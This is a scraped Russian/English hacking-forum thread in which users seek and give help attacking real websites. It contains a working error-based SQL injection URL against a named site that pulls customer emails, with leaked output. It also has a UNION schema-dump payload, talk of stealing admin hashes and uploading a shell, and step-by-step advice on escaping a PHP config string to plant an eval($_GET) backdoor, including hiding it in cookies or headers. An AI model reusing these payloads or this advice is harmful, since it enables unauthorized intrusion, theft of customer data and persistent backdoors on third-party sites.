Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Sc0rpi0n

    Sc0rpi0n Banned

    Joined:
    23 Feb 2010
    Messages:
    75
    Likes Received:
    22
    Reputations:
    16
    запрещены следующие функции php

    Нужно запустить свою прогу (сплоит из под веба). подскажите плиз функции другии которые это могут сделать
     
  2. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    это алиас shell_exec, а он disabled - так что не прокатит.
     
    2 people like this.
  3. Flashmx

    Flashmx New Member

    Joined:
    27 Apr 2010
    Messages:
    25
    Likes Received:
    4
    Reputations:
    5
    Помогите пожалуйста с инъекцией
    http://www.easyhandwriting.com/catalog/product_info.php/products_id/12' or 1 group by concat((select customers_email_address from customers limit 0,1),floor(rand(0)*2)) having min(0) or 1 -- 1
     
  4. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    эм... а из каких соображений там инъекция?
     
    1 person likes this.
  5. Vostok

    Vostok New Member

    Joined:
    20 Sep 2009
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    Подкиньте префиксы от таблиц.
     
  6. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Стандартные префиксы разные в каждой CMS.
    Для DLE - dle_
    Joomla - jos_
    WordPress - wp_
    И т. д.
     
  7. Flashmx

    Flashmx New Member

    Joined:
    27 Apr 2010
    Messages:
    25
    Likes Received:
    4
    Reputations:
    5
    http://www.easyhandwriting.com/catalog/product_info.php/products_id/12' or 1 group by concat((select customers_email_address from customers limit 0,1),floor(rand(0)*2)) having min(0) or 1 -- 1
    1064 - You have an error in your SQL syntax

    http://www.easyhandwriting.com/catalog/product_info.php/products_id/12' or 1 group by concat(user(),floor(rand(0)*2)) having min(0) or 1 -- 1
    1062 - Duplicate entry 'easyhw@localhost1' for key 1
     
    1 person likes this.
  8. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Третья ветка. Надо читать мануалы :)
    Прокрути страницу вниз :D
     
    1 person likes this.
  9. beBoss

    beBoss New Member

    Joined:
    29 Sep 2010
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    Hi guys, I need help for hacking a site. Well first I sorry for that I'm writing on english (i will use and google translator for russian, but not sure if will be understandable). So I'm not good, well let's be honest, I'm noob in this (hacking, sql hacking etc). But after hours of trying I found a vuln (not sure), but I think is vuln.

    Well is that a vuln ? And If it, can you help me with creating a sql injections ?


    Now I will try to translate it to russian, and really sorry about that. i'm from Bulgaria and I should understand your language, but unfortunately I don't. And I think if I write it to bulgarian you wont understand it, so...

    Translate from google translator:

    Привет, ребята, мне нужна помощь для взлома сайта. Ну сначала я извиняюсь за это я пишу на английском языке (я буду использовать и Google Translator для России, но не уверен, если будет понятно). Так что я не очень хорошо, ну давайте будем честными, я нуб в этом (взлом, взлом SQL и т.д.). но после нескольких часов пытался я нашел vuln (не уверен), но я думаю, vuln.

    Ну, что vuln? И если это, можете ли вы помочь мне в создании SQL-инъекций?

    Теперь я постараюсь перевести его на русский, и действительно сожалею об этом. Я из Болгарии и я понимаю ваш язык, но к сожалению я не делаю. И я думаю, если я напишу его на болгарский вам не понять, так что ...
     
    #17369 beBoss, 20 Jul 2011
    Last edited: 20 Jul 2011
  10. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    PM me link - i will try to help you
     
  11. beBoss

    beBoss New Member

    Joined:
    29 Sep 2010
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    Hey I succeeded. Thanks for your time, and sorry again for that i'm writing in english.

    edit: I have a question: how to use "update" in sql and is it possible ?

    This is sql injection with select:
    Code:
    +union+select+1,2,3,4,5,6,7,8,9,10,group_concat(schema_name),12 from information_schema.schemata--+-
    how to update any table? :)
     
    #17371 beBoss, 20 Jul 2011
    Last edited: 20 Jul 2011
  12. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    it's impossible

    http://www.qatcom.com/yellowpages/view/-66854%27 - нету скули
     
  13. beBoss

    beBoss New Member

    Joined:
    29 Sep 2010
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    So in my case, I can only read info... Well I can get admins hash passwords, but I can't login with them. Only can login with member and vip acc, but they are simple acc. There is something in mods and admins acc, may be cookie or something that I don;t have and when change my cookies with admin cookies it's logout me.... What can I do ? Is there chance to upload shell or to know what is different with acc, or any way to change someting ? :S
     
  14. Sloneny

    Sloneny New Member

    Joined:
    8 Mar 2010
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    к index.php подключается include('includes/header.php');
    строки из header.php
    PHP:
    <meta name="description" content="<?php echo $hc_cfg6;?>" />
        <meta name="keywords" content="<?php echo $hc_cfg5;?>" />
    значения $hc_cfg6 и $hc_cfg5; берутся из таблицы в файле config.php
    PHP:
    $hc_cfg5 "12345";
    $hc_cfg6 "123";
    через админку в файл config.php удается прописать eval($_GET[e]);
    результат
    PHP:
    <?php
    ***
    $hc_cfg4 "us.";
    $hc_cfg5 "12345";
    $hc_cfg6 "eval($_GET[e]);";
    $hc_cfg7 "1";
    $hc_cfg8 "0[country]";
    ***
    ?>
    но ?e=phpinfo(); выводит пустую страницу.

    (если прописать system($_GET['e']); весь сайт накрывается ошибкой
    Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/******/public_html/******/******/config.php on line 9

    если прописать <?php eval($_GET[e]); ?> то в index.php выглядит так
    PHP:
    <meta name="description" content="<?php eval(); ?>" />
    Подскажите пожалуйста где я ошибся? Или что делаю не так?
     
    #17374 Sloneny, 20 Jul 2011
    Last edited: 20 Jul 2011
  15. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    ты сначало убедись что пхп работает как надо, пропеши команду
    если там где вставил , будет вывод 123, значит робит норм, встовляй тогда где тебе нужно вот этот код:
    и вызываешь еко так "?e=phpinfo();"
     
    _________________________
  16. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Sloneny
    Тебе нужно выйти за кавычки, иначе получается, что переменная $hc_cfg6 имеет тип string и содержит строку eval($_GET[e]); соответственно код выполняться не будет
    Вписываешь что то вроде
    PHP:
    ";eval($_GET[e]);"
    в итоге получаешь выполнение кода
    PHP:
    $hc_cfg6 "";eval($_GET[e]);"";
    ?e=phpinfo(); выведет phpinfo
     
    #17376 h00lyshit!, 20 Jul 2011
    Last edited: 20 Jul 2011
    1 person likes this.
  17. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Если админка фильтрует кавычки, то ты ничто не сделаешь, это банальная XSS. Если же нет, нужно просто выйти за переменную и вставить выполняемый код, как показал h00lyshit!(Если фильтруется двоеточие, то можно вставить код в саму переменную - ".код.").

    Но при этом лучше использовать не GET и POST, а куки или HTTP заголовки. Так же возможно, что на стороне сервера запрещено выполнение этих функций.

    При этом можно использовать что то типа $a($b) или вставлять нужный код напрямую.
     
    #17377 randman, 20 Jul 2011
    Last edited: 20 Jul 2011
    1 person likes this.
  18. Sloneny

    Sloneny New Member

    Joined:
    8 Mar 2010
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    echo "123"; просто в исходном становится
    <meta name="description" content="echo '123';" />
    больше нигде не выводит
    " превращает в '
    $hc_cfg6 = "echo '123';";
    $hc_cfg6 = " ';eval($_GET[e]);' ";

    видимо придется искать другие пути:(
     
  19. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    считай, что ты можешь вывести значение любой переменной, от этого и пляши. Только вот переменные выводи так:
    Code:
    <?php
    $a = "{$_SERVER['DOCUMENT_ROOT']}";
    echo $a;
    ?>
    
    а не
    Code:
    <?php
    $a = "$_SERVER['DOCUMENT_ROOT']";
    echo $a;
    ?>
    
     
    1 person likes this.
  20. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    А почему бы и нет? Только одинарные кавычки здесь не к чему.
    Code:
    <?php
    $a = "$_SERVER[DOCUMENT_ROOT]";
    echo $a;
    ?>
    
    И фигурные скобки, и кавычки могут экранироваться :)
     
    #17380 randman, 20 Jul 2011
    Last edited: 20 Jul 2011
Thread Status:
Not open for further replies.